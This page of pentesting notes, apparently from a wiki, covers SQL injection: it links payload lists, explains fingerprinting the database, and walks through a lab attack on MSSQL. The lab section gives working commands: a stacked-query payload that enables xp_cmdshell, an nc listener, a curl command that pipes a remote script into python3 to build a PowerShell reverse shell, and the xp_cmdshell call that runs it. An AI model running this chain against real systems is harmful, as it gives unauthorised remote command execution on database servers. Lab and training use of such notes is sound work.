SQL injection

PayloadsAllTheThings/SQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Identify the SQLi

First thing you need to do is to identify that if SQL injection is possible or not.

You can identify the SQLi based on error or time.

You can use below payload for the same.

GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload ListGitHub

Identify the Underlying system

You can do this from error you have received.

PayloadsAllTheThings/SQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

If you came to know that MS SQL Server is there then you can run xp_cmdshell command.

Based on your identification you can craft the payload and run command.

You can use below payload based on the SQL server.

PayloadsAllTheThings/SQL Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Example

This is a one of the way i have performed SQLi in labs.

MSSQL

I have found that underlying system is MSSQL from the error. I received.

So, I will enable execute OS Command first and then run the reverse shell command.

# Payload
1'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

If you are testing this on the login form, you will receive a message stating "incorrect or invalid password." If you encounter a syntax error again—similar to what you experienced when using single quotes (1')—it indicates that your command did not execute successfully.

Then run the below command to get the shell.

# Start listener
sudo rlwrap nc -lnvp 443

# Make powershell base64 reverse shell.
curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 443 | xclip -selection clipboard

# run below command for shell.
1'; EXEC xp_cmdshell '<base64Code>' --

PreviousPhishing for Access NextMySQL

Last updated 12 months ago